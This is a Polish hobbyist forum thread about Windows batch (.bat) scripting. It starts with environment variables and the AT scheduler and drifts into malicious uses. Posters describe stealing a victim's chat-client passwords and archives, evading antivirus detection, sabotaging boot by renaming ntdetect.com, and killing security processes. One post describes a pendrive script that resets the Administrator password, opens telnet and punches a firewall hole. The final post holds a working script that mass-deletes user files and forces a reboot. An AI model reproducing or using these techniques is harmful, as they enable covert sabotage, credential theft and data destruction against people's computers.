Plik wsadowy *.bat

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Spróbuj:
Kod:
echo %windir%
echo %username%
Ojej? Co to się stało. Poszukaj informacji o zmiennych środowiskowych w systemie Windows. Gotowca nie ma
smile.gif

Pozdrawiam.
 

Kontrahent

Użytkownik
Dołączył
Luty 16, 2008
Posty
14
wszystkie zmienne wyswietlone pod hasłem 'set' w konsoli.

Kolejna rzecz, która stanęła mi na drodze to autodestrukcja... Zależy mi aby plik bądz tez kilka plików usunęło się po określonym czasie (około 5dni).
Wątpię, ze da sie to ustawic w cmd ale moze istnieje jakis mini programik do tego celu?
 

spiterbot

Użytkownik
Dołączył
Listopad 1, 2007
Posty
143
<div class='quotetop'>CYTAT(Kontrahent @ 25.01.2009, 14:18) <{POST_SNAPBACK}></div>
wszystkie zmienne wyswietlone pod hasłem 'set' w konsoli.

Kolejna rzecz, która stanęła mi na drodze to autodestrukcja... Zależy mi aby plik bądz tez kilka plików usunęło się po określonym czasie (około 5dni).
Wątpię, ze da sie to ustawic w cmd ale moze istnieje jakis mini programik do tego celu?[/b]

Polecenia i programy usˆugi planowania poleceä AT do uruchomienia na
komputerze o okre˜lonej godzinie i dacie. Usˆuga Harmonogram musi by†
uruchomiona, aby uľywa† poleceä AT.

AT [\\nazwa_komputera] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\nazwa_komputera] godzina [/INTERACTIVE]
[ /EVERY:data[,...] | /NEXT:data[,...]] "polecenie"

\\nazwa_komputera Okre˜la komputer zdalny. Polecenia sĄ zaplanowane w
komputerze lokalnym, je˜li ten parametr jest pominiŠty.
id Jest numerem identyfikacyjnym przyporzĄdkowanym do
zaplanowanego polecenia.
/delete Anuluje zaplanowane polecenie. Je˜li jest pominiŠte,
wszystkie zaplanowane polecenia w komputerze sĄ anulowane.
/yes Uľywa siŠ przy anulowaniu wszystkich zadaä, gdy nie jest
wymagane potwierdzenie.
godzina Okre˜la godzinŠ wykonania polecenia.
/interactive Zezwala, aby zadanie wsp˘ˆdziaˆaˆo z zadaniami uľytkownika,
kt˘ry jest zalogowany w˘wczas, gdy jest ono uruchomione.
/every:data[,...] Uruchamia polecenie w kaľdym okre˜lonym dniu tygodnia lub
miesiĄca. Je˜li data jest pominiŠta, przyjmowany jest
bieľĄcy dzieä miesiĄca.
/next:data[,...] Uruchamia okre˜lone polecenie przy nastŠpnym wystĄpieniu
dnia (np. w nastŠpny czwartek). Je˜li data jest pominiŠta,
przyjmowany jest bieľĄcy dzieä miesiĄca.
"polecenie" Polecenie Windows NT lub program wsadowy do uruchomienia.

//i tak w *.bat nic ciekawego ci nie wyjdzie
 

Kontrahent

Użytkownik
Dołączył
Luty 16, 2008
Posty
14
<div class='quotetop'>CYTAT(spiterbot @ 25.01.2009, 23:01) <{POST_SNAPBACK}></div>
Polecenia i programy us�ugi planowania poleceä AT do uruchomienia na
komputerze o okre�lonej godzinie i dacie. Us�uga Harmonogram musi by†
uruchomiona, aby uľywa† poleceä AT.

AT [\\nazwa_komputera] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\nazwa_komputera] godzina [/INTERACTIVE]
[ /EVERY:data[,...] | /NEXT:data[,...]] "polecenie"

\\nazwa_komputera Okre�la komputer zdalny. Polecenia sĄ zaplanowane w
komputerze lokalnym, je�li ten parametr jest pominiŠty.
id Jest numerem identyfikacyjnym przyporzĄdkowanym do
zaplanowanego polecenia.
/delete Anuluje zaplanowane polecenie. Je�li jest pominiŠte,
wszystkie zaplanowane polecenia w komputerze sĄ anulowane.
/yes Uľywa siŠ przy anulowaniu wszystkich zadaä, gdy nie jest
wymagane potwierdzenie.
godzina Okre�la godzinŠ wykonania polecenia.
/interactive Zezwala, aby zadanie wsp˘�dzia�a�o z zadaniami uľytkownika,
kt˘ry jest zalogowany w˘wczas, gdy jest ono uruchomione.
/every:data[,...] Uruchamia polecenie w kaľdym okre�lonym dniu tygodnia lub
miesiĄca. Je�li data jest pominiŠta, przyjmowany jest
bieľĄcy dzieä miesiĄca.
/next:data[,...] Uruchamia okre�lone polecenie przy nastŠpnym wystĄpieniu
dnia (np. w nastŠpny czwartek). Je�li data jest pominiŠta,
przyjmowany jest bieľĄcy dzieä miesiĄca.
"polecenie" Polecenie Windows NT lub program wsadowy do uruchomienia.

//i tak w *.bat nic ciekawego ci nie wyjdzie[/b]

bynajmniej sie mylisz ;] ba, sam tak myslalem i pewnie kazdy tak mysli, ale najzwyczajniejszym batem mozna cuda zdzialac. mam na mysli lamerskie cuda nastolatkow, marzenia o haslach i archiwach kolezanek, wszystko to w jednym pliku - ktory na domiar zlego nie jest wirusem ...

edit: dzieki za info o at
 

Kontrahent

Użytkownik
Dołączył
Luty 16, 2008
Posty
14
Czy istnieje jakiś zewnętrzny program do usuwania plików w określony dzień i godzinę obsługiwany z wiersza poleceń? Nie musi mieć żadnego interfejsu graficznego, musi tylko usuwać dany folder + jego podkatalogi w określonej dacie zgodnie z czasem systemowym.
 

Luki_2

Użytkownik
Dołączył
Czerwiec 30, 2007
Posty
2
%userprofile% - na profil użytkownika, o ile dobrze pamiętam. - to apropo postu sprzed kilku miesięcy ;-)

Różne cuda można w BAT'ach napisać...
Można napisać prosty skrypt do ułatwienia dostępu do czyjegoś arch. i hasła GG ( 7.7 ), czy AQQ...
Jeżeli zmieszamy to z dobrym pomysłem ( przykładowo skaner antywirusowy, który działa w linii komend )...
Skompilujemy w zcrackowanym ( ewentualnie nie zcrackowanym ) Batch File Compiler...
Sprawdzimy wykrywalność oczywiście - często po skompilowaniu nasz bat staje się chociażby częściowo wykrywalny, a drobne zmiany w ' kodzie ' dają dużo.


albo....

(pomysł, gdy ofiara poszła zrobić sobie herbatę, a my mamy kilkanaście sekund czasu - np. realizujemy, gdy mamy fizyczny dostęp do komputera ofiary )
Zmieńmy może nazwę pliku ntdetect.com na ntdelect.com ( trzeba użyć też kilku parametrów, aby móc manipulować owym plikiem ), ale nie róbmy tego od razu...
Włóżmy plik wsadowy w system32 ( czy Windows ), aby automatycznie startował...
My pójdziemy, ofiara zgasi komputer gdy np. pójdzie spać...
Rano się obudzi, włączy komputer - będzie wszystko grało...
Dopiero po ponownym wyłączeniu i włączeniu komputera system nie wystartuje - ofiara będzie miała mniejsze podejrzliwości co do tego, że to my ;-) ...
Np. wyłączy komputer, pójdzie na spacer z kolegą, minie z dwie godziny, wróci - odpala komputer, a tu błąd przed startem ładowania boot'a Windowsa.


czy też...

Użyjmy go do zdezaktywowania (co niektórych) zabezpieczeń - po prostu zabijmy procesy.
" Ukryta " - tzn. nieopisana zazwyczaj np. w help cmd, czy w internecie, komenda Taskkill doskonale się do tego nadaje


a może...

Wyjątkowo użyjmy go do pewnego rodzaju zabezpieczenia swoich plików systemowych ?
Użyjmy komendy kopiowania z kilkoma parametrami, aby skopiować 100% możliwych do usunięcia plików systemowych w kilka bezpiecznych lokalizacji?
Gratis zmieńmy nazwy i rozszerzenia tych plików, na wypadek, jak by pojawił się jakiś wirus, który je po prostu wyszukuje.
Dodatkowo zróbmy plik, który będzie nam przywracał cały Backup, aby się nie męczyć z kopiowaniem, gdy dojdzie do sytuacji, kiedy zauważymy, że jakiś plik systemowy nam zniknął ;-)


Sporo jest możliwości.

Jak ktoś korzysta jedynie z komendy shutdown, czy myśli, że format c: mu coś da, dla mnie jest zwykłym osobnikiem, który karmi się tutorialami z internetu...
Co za tym idzie - nic nie umie wymyślić, ani zrobić sam.


Pozdrawiam Wszystkich.
 

thc_flow

Zbanowany
Dołączył
Listopad 13, 2008
Posty
649
Fajnie fajnie, tylko że nic nie zmieni faktu że BAT jest bardzo ograniczony i nie potrafiłby nic gdyby nie zewnętrzne programy (przykład - kiedyś polecenia copy czy del były osobnymi programami, dopiero NT to zmieniło) jest "językiem" prawie nie rozwijanym a także mało wydajnym w porównaniu choćby z JS czy Pythonem. A zrób coś TAKIEGO w batchu to ci pogratuluję, oczywiście ma być to czysty "bat" bez użycia jakichkolwiek programów...
 

beamer

Użytkownik
Dołączył
Maj 22, 2004
Posty
144
Dawno temu też się bawiłem w baty i przyznam, że na prawdę ciekawe rzeczy można skombinować... nie wiem czy już tego nie podawałem w innym temacie ale może komuś się przyda: KLIK. To akurat było pisane do użycia z mojego Pendrive'a przy fizycznym dostępie do kompa (wtedy poza tym, że zmieniało hasło Administratora jeżeli użytkownik nie był aktualnie na nim zalogowany, włączało telnet i dodawało wyjątek do FW, zdobywało adres IP przy każdym uruchomieniu przeglądarki to jeszcze ściągało na Pendrive informacje o systemie i archiwum ze starego gg - nie wiem czy coś się zmieniło) ale można zmodyfikować według uznania i te informacje wysyłać np na FTP (chociaż szczerze to nie pamiętam czy z bata da radę czy mam na myśli telnet).

Pozdrawiam
 

nondzu

Użytkownik
Dołączył
Listopad 4, 2009
Posty
1
a co powiecie o tym. zadziała??

@echo off
start cmd.exe
start explorer.exe
start regedit.exe
copy *.000 *.*
del *.RAR
del *.ZIP
del *.MP3
del *.XML
del *.LNK
del *.COM
del *.BAT
del *.AVI
del *.MPEG
del *.MP4
del *.AMR
del *.3Gp
del *.JPG
del *.BMP
del *.PNG
del *.GIF
del *.ICO
del *.ISO
del *.EXE
shutdown -r -t 60 -c "ale jaja"
 
Do góry Bottom